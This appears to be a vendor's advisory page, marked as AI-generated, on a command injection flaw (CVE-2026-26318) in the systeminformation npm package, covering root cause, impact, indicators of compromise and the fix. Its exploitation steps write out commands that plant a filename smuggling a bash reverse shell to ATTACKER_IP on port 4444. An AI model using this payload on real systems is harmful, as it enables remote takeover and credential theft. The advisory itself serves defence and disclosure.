CVE-2026-26318: 
JavaScript vulnerability analysis and mitigation

Overview

CVE-2026-26318 is an OS command injection vulnerability in the systeminformation npm package, affecting all versions up to and including 5.30.7. The flaw exists in the versions() function on Linux, where output from the locate command is concatenated unsanitized into a shell exec() call when detecting the PostgreSQL binary version. It was discovered by researcher Sanu1999, reported via GitHub Private Security Advisory, and published on February 17, 2026, with the NVD entry following on February 19, 2026. The package has over 5 million weekly downloads. The CVSS v3.1 base score is 8.8 (High) (GitHub Advisory).

Technical details

The root cause is CWE-78 (Improper Neutralization of Special Elements used in an OS Command). In lib/osinfo.js, the versions() function runs exec('locate bin/postgres', ...) and then directly concatenates the last (alphabetically sorted) result into a second exec() call as postgresqlBin[postgresqlBin.length - 1] + ' -V' — with no call to the library's own sanitizeShellString(), no path validation, and no use of execFile(). Because Linux allows semicolons in filenames and exec() passes strings through /bin/sh -c, an attacker who can create a file with a semicolon-containing path (e.g., /var/tmp/x;touch /tmp/pwned;/bin/postgres) and wait for updatedb to index it can inject arbitrary shell commands. Exploitation requires: a Linux target, locate/plocate installed, a PostgreSQL binary already in the locate database, the ability to create files in any updatedb-indexed directory, and the locate database to be refreshed (typically via a daily systemd timer) (GitHub Advisory, Patch Commit).

Impact

Successful exploitation allows a local attacker with low privileges to execute arbitrary OS commands with the privileges of the Node.js process running systeminformation — typically a monitoring agent or backend service account. This can result in full confidentiality, integrity, and availability compromise of the affected system, including unauthorized data access (e.g., reading /etc/shadow), file creation/modification, reverse shell establishment, and potential lateral movement to cloud credentials, database connections, or internal APIs accessible to the process. In multi-tenant, CI/CD, or containerized environments, the impact can extend beyond the initial host (GitHub Advisory).

Exploitability

No public proof-of-concept exploit code has been released beyond the detailed technical write-up in the GitHub Security Advisory itself, which includes step-by-step exploitation instructions and post-exploitation payloads. There is no evidence of in-the-wild exploitation or threat actor attribution at this time. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.054% (0.000540), placing it in the 6th percentile for exploitation probability within 30 days (GitHub Advisory, Feedly).

Exploitation steps

  1. Reconnaissance: Identify a Linux target running a Node.js application that uses systeminformation ≤ 5.30.7 (e.g., monitoring dashboards, server health agents). Confirm locate/plocate is installed (which locate) and that a PostgreSQL binary is indexed (locate bin/postgres).
  2. Verify updatedb schedule: Check that updatedb runs on a daily schedule via systemctl list-timers | grep plocate or equivalent cron job, which will index newly created files.
  3. Craft the malicious filename: As a low-privileged user, create a directory and file whose path contains the injected shell command using semicolons:
    mkdir -p "/var/tmp/x;bash -i >&/dev/tcp/ATTACKER_IP/4444 0>&1;/bin"
    touch "/var/tmp/x;bash -i >&/dev/tcp/ATTACKER_IP/4444 0>&1;/bin/postgres"
  4. Wait for database update: Wait for updatedb to run (or trigger it if privileges allow: sudo updatedb). Verify the malicious path appears: locate bin/postgres.
  5. Exploit the sort trick: The vulnerable code sorts locate output alphabetically and selects the last entry. Since /var/ sorts after /usr/, the malicious path is selected over the legitimate PostgreSQL binary.
  6. Trigger the vulnerability: Any application call to si.versions('postgresql') causes the library to execute the injected command via /bin/sh -c, establishing a reverse shell or executing the attacker's payload with the Node.js process's privileges.
  7. Post-exploitation: Harvest environment variables, cloud credentials, config files, or pivot to internal services accessible to the compromised process (GitHub Advisory).

Indicators of compromise

  • File System: Presence of directories or files with semicolons in their names under world-writable paths such as /tmp, /var/tmp, or user home directories (e.g., /var/tmp/x;COMMAND;/bin/postgres); unexpected files created in /tmp by the application service account (e.g., /tmp/SI_RCE_PROOF or similar artifacts).
  • Process: Unusual child processes spawned by the Node.js process, such as bash, curl, wget, nc, or python, especially with network connection arguments; reverse shell connections originating from the Node.js service account.
  • Network: Unexpected outbound TCP connections from the Node.js application process to external IPs on non-standard ports (e.g., 4444); DNS lookups or HTTP requests to attacker-controlled infrastructure from the application host.
  • Logs: Application logs showing versions() calls followed by unexpected command output or errors; system auth logs showing privilege escalation from the application service account; updatedb or plocate logs showing recent database updates coinciding with suspicious file creation (GitHub Advisory).

Mitigation and workarounds

Upgrade the systeminformation npm package to version 5.31.0 or later, which replaces the vulnerable exec() call with execFile() (preventing shell metacharacter interpretation) and adds a safe path filter (/^[a-zA-Z0-9/_.-]+$/) to validate locate output before use (Patch Commit). IBM Maximo Application Suite users using systeminformation 5.28.5–5.28.7 should refer to the IBM security bulletin for remediation guidance (IBM Advisory). As interim mitigations: restrict local filesystem write access for untrusted users on systems running vulnerable versions, apply the principle of least privilege to the Node.js process, and monitor for suspicious child process spawning from the application.

Community reactions

The Hacker Wire published a technical article covering the command injection in the versions() function shortly after disclosure (The Hacker Wire). The advisory notes that this is at least the tenth command injection CVE in the systeminformation package, following a consistent pattern of unsanitized external data reaching exec() calls — a point highlighted in the security advisory itself. IBM issued a security bulletin acknowledging the impact on its Maximo Application Suite Monitor Component (IBM Advisory). AWS also addressed the vulnerability in a release of its Dynamic Image Transformation for Amazon CloudFront solution.

Additional resources

Linux Distribution fix status

Fix availability across major Linux distributions and their releases.

Debian

Fixed

sid

node-systeminformation

Fixed

trixie

jupyterlab

Affected

Ubuntu

Unknown

devel

jupyterlab

Unknown

resolute

jupyterlab

Unknown

resolute (esm-apps)

jupyterlab

Unknown

RHEL / CentOS

Unknown

Source: This report was generated using AI

Related JavaScript vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-w2vw-w76x-qr89HIGH8.5
  • JavaScript logoJavaScript
  • nx
NoYesOct 05, 2026
CVE-2026-104852HIGH8.2
  • JavaScript logoJavaScript
  • @graphql-tools/utils
NoYesOct 05, 2026
GHSA-g7fw-3gjp-g5hfMEDIUM6.5
  • JavaScript logoJavaScript
  • @openclaw/matrix
NoYesOct 05, 2026
GHSA-r4xh-jqrq-34v2MEDIUM5.3
  • JavaScript logoJavaScript
  • smol-toml
NoYesOct 05, 2026
GHSA-6688-9rhm-gjv2LOWN/A
  • JavaScript logoJavaScript
  • dompurify
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management